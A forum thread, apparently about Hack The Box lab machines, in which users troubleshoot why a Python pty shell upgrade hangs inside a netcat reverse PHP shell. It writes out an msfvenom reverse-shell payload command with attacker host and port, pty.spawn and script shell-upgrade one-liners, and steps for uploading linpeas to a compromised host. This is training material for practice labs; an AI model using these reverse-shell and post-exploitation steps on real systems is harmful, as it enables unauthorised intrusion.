Python pty.spawn not working

edited May 18 in Off-topic

I'm at the point where I have a reverse php shell using netcat, and when I try to spawn a shell using "python -c import pty; pty.spawn('/bin/bash');" my shell does not spawn. The shell either becomes unresponsive or just nothing happens and I'm left with the defaul shell. I know this should work on this machine and that this is exactly when/where others have run the same command successfully. I am newer to pentesting so is there another reason that this may not be working correctly? thanks

Comments

  • check if python is actually present, or if python3 is. accordingly run that command

    If my hints help you out, remember to +respect me

  • Also it should be

    python -c 'import pty; pty.spawn("/bin/sh")'

    If my hints help you out, remember to +respect me

  • Im positive that it's present. Just my command doesn't work when I am literally watching an IppSec video where his does

  • Well he's using /bin/bash, but I did try both, same result unfortunately

  • @JWindy92 your command above was incorrect format. see @thesithlord 's above. quotes are very important.

  • Well, I've tried the single and double quotes in both orientations, and that was a typo in the post, but in my console I was not missing the second quotation around /bin/bash.

    I've edited the original

  • @JWindy92 said:

    I've edited the original

    Your edited one still has a typo.

    Can you check you've run python -c 'import pty; pty.spawn("/bin/sh")' - note single quote after the -c and double quotes around /bin/bash?

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Yea I was already certain I had run it both ways just to make sure, but I just went and checked again, copy and pasted your command, and still nothing. My shell doesn't exit necessarily, just seems to kind of hang

  • Ok - that is a little bit odd.

    For clarity, when you run python -c import pty; pty.spawn("/bin/sh") it should hang because all you've done is run python -c import pty and then tried to issue a python command to the shell interpreter.

    However if you have enclosed the whole string, it should be treated as a blob to pass to python. This doesn't always work (I find "shell upgrades" break often enough that I only do them if I really, really need to), but I get you are following a walkthrough where it is used, so it should work unless something on the box has changed since then.

    Try it with a bash shell to see if that makes a difference.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • I was using a bash shell, but I tried both for the sake of being thorough. I'm not even following the walkthrough necessarily in order to exploit the machine. The only reason I pulled it up in the first place was because my shell upgrade wasn't working and I wanted to double check that I wasn't doing anything wrong. However we both get a shell via nc, and running the code on the machine, then his upgrade works and mine doesnt. So I'm just at a loss.

  • edited May 18

    Again I'm new, this is the msfvenom command I'm using,
    msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=1234 -f raw > shell2.htb

    any red flags there?

    EDIT: I guess I should mention the .htb extention is being run as .php by the server. Not sure if you would know/remember that if you maybe haven't done the box before or in a while since you're more advanced than I am

  • What is the machine?

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • I've had trouble with msf PHP shells before where I couldn't run certain interactive commands. I try to stay away from them when I can. It's been a while though since I've seen this.
    You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

  • @TazWake said:
    What is the machine?

    I just try to run following on the foothold of Magic, not working.
    python3 -c 'import pty; pty.spawn("/bin/sh")'

  • Type your comment> @6uta said:
    > (Quote)
    > I just try to run following on the foothold of Magic, not working.
    > python3 -c 'import pty; pty.spawn("/bin/sh")'

    Hey. The command is right.
    Try socat interactive shell, if python/python3 is not present.
    But I'm sure your command is right.

    What response exactly you get after executing python pty script?
  • Type your comment> @zaicurity said:
    > I've had trouble with msf PHP shells before where I couldn't run certain interactive commands. I try to stay away from them when I can. It's been a while though since I've seen this.
    > You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

    Maybe because I don't know it well enough, but I never understood the fuss of metasploit: it's confusing that it's like a shell but not really and if you get used to it: on any half decent windows machine the av will pick it up and throw you out.
    Never even thought of using it. I just don't like to use stuff that I don't know what it's doing exactly... The benefits I know of don't compare to all the downsides I experienced with it.

    That being said: @6uta, you generated a meter prefer payload, and you try to upgrade that session to one with auto complete. That it?

    Not sure if meterprefer can. My suggestion would be to stay away from meter prefer sessions whenever you have a choice.
  • @6uta said:

    I just try to run following on the foothold of Magic, not working.
    python3 -c 'import pty; pty.spawn("/bin/sh")'

    That should work on Magic. When you say it is "not working" , what actually happens? Does nothing happen or do you get an error message?

    @gnothiseauton

    Maybe because I don't know it well enough, but I never understood the fuss of metasploit:

    I agree. Sometimes it can make life easier but all too often the varying payloads just confuse people. People expect everything to be a meterpreter shell but it rarely works that way.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • If you need a shell that can use su or sudo, you can use /usr/bin/script -qc /bin/bash /dev/null on any linux box as far as I know. It won't give you tab complete or command history, though.

    marlasthemage

  • Type your comment> @TazWake said:

    @6uta said:

    I just try to run following on the foothold of Magic, not working.
    python3 -c 'import pty; pty.spawn("/bin/sh")'

    That should work on Magic. When you say it is "not working" , what actually happens? Does nothing happen or do you get an error message?

    Sorry to not describe clearly.
    The php reverse shell become unresponsive once I sent: python -c "import pty; pty.spawn('/bin/bash');"
    But everything is working fine if I use perl reverse shell.

  • @6uta said:

    Sorry to not describe clearly.
    The php reverse shell become unresponsive once I sent: python -c "import pty; pty.spawn('/bin/bash');"
    But everything is working fine if I use perl reverse shell.

    Glad to hear you've got a solution, even if it is far from ideal.

    I've just tried on Magic and this worked python3 -c 'import pty; pty.spawn("/bin/bash")' but I cant see why using the double/single quotes the other way round should make a difference.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • edited July 6

    I'm having the same issue. But in my case, it closes out my reverse connection and knocks me to my host machine terminal.

    Here is the output -

    https://imgur.com/a/Nl4S4Ei

    What will be a solution for this? @TazWake

  • I am not sure. Does this happen every time you try it? How long can you keep a shell if you don't try to upgrade it?

    You dont actually need an upgraded shell on the box you are looking at there.

    As an alternative, you could try using Metasploit as that definitely works with the shell upgrade you've tried.

    But, realistically, other than a more attractive path shown on the command line, there isn't a huge advantage to doing this.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • edited July 7
    . Sorry this was mistake comment.
  • edited July 7

    @dbstart09, it kind of looks like instead of using a single quote, you used the tick mark under the tilda. If it is in fact a single quote, then I'm not sure why it's not working for you.

    marlasthemage

  • Thanks, @TazWake and @marlasthemage now I got the shell as tomcat.

    But now a new problem is what to do next. Whenever I go each directory only has read-only permissions. Try to download linpeas but getting this "Could not resolve the hostname: github.com".

    Eventually, tried Netcat listener on tomcat shell and sent linpeas from my local machine. Now I can't run it. With sudo it asks for the password for tomcat and I put what I have but no use at all.

    Any hint on what to try next?

    TIA

  • @dbstart09 said:

    Thanks, @TazWake and @marlasthemage now I got the shell as tomcat.

    But now a new problem is what to do next. Whenever I go each directory only has read-only permissions. Try to download linpeas but getting this "Could not resolve the hostname: github.com".

    Eventually, tried Netcat listener on tomcat shell and sent linpeas from my local machine. Now I can't run it. With sudo it asks for the password for tomcat and I put what I have but no use at all.

    Any hint on what to try next?

    You will get better answers if you ask this on the thread for the specific box.

    Most HTB boxes will prevent you accessing internet resources. You need to download to your machine and then upload to the box.

    If things are read-only, you can still read them.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

Sign In to comment.